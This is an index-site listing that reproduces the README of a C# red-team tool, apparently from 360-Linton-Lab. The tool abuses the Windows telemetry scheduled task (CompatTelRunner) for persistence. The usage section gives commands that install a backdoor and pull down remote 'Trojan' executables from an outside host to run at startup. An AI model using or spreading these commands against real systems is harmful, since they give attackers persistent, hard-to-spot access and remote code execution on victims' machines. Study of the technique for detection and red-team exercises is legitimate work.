Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/360-Linton-Lab/Telemetry
WINDOWS TELEMETRY权限维持
https://github.com/360-Linton-Lab/Telemetry
Last synced: 21 days ago
JSON representation
WINDOWS TELEMETRY权限维持
- Host: GitHub
- URL: https://github.com/360-Linton-Lab/Telemetry
- Owner: 360-Linton-Lab
- Created: 2020-07-02T08:50:29.000Z (over 4 years ago)
- Default Branch: master
- Last Pushed: 2020-07-02T09:03:45.000Z (over 4 years ago)
- Last Synced: 2024-08-05T17:24:20.041Z (4 months ago)
- Language: C#
- Homepage:
- Size: 1.2 MB
- Stars: 259
- Watchers: 7
- Forks: 48
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - 360-Linton-Lab/Telemetry - WINDOWS TELEMETRY权限维持 (C# #)
README
# TELEMETRY
### Background
[TELEMETRY](#TELEMETRY-1) is a C# For Windows PERSISTENCE
Today we’re going to talk about a persistence method that takes advantage of some of the wonderful telemetry that Microsoft has included in Windows versions for the last decade.
- **Local admin rights to install (requires the ability to write to HKLM)**
- **Have CompatTelRunner.exe**
- **2008R2/Windows 7 through 2019/Windows 10**### Advantage
- **Using the system's own Telemetry planned tasks**
- **Only registry suspicious backdoor troubleshooting**### Command Line Usage
ABUSING WINDOWS TELEMETRY FOR PERSISTENCE
.Imanfeng
Features:
Install: - Deployment authority maintains backdoor
Command:
TELEMETRY.exe install /command:calc
- Execute command without file backdoor
TELEMETRY.exe install /url:http://8.8.8.8/xxx.exe /path:C:\Windows\Temp\check.exe
- Remotely download Trojan files to the specified directory for backdoor startup
TELEMETRY.exe install /url:http://8.8.8.8/xxx.exe
- Remotely download Trojan files to C:\\Windows\\Temp\\compattelrun.exe for backdoor startup
TELEMETRY.exe install /path:C:\Windows\Temp\check.exe
- Set path Trojan files for backdoor startup
Parameter:
/command: - Execute Command
/url: - Download FROM
/path: - Download To- Execute command without file backdoor
```
Telemetry.exe install /command:calc
```![1](PIC/2.png)
- Remotely download Trojan files for backdoor startup
```
Telemetry.exe install /url:http://vps:8089/System.exe
```![2](PIC/1.png)
### Learn
https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/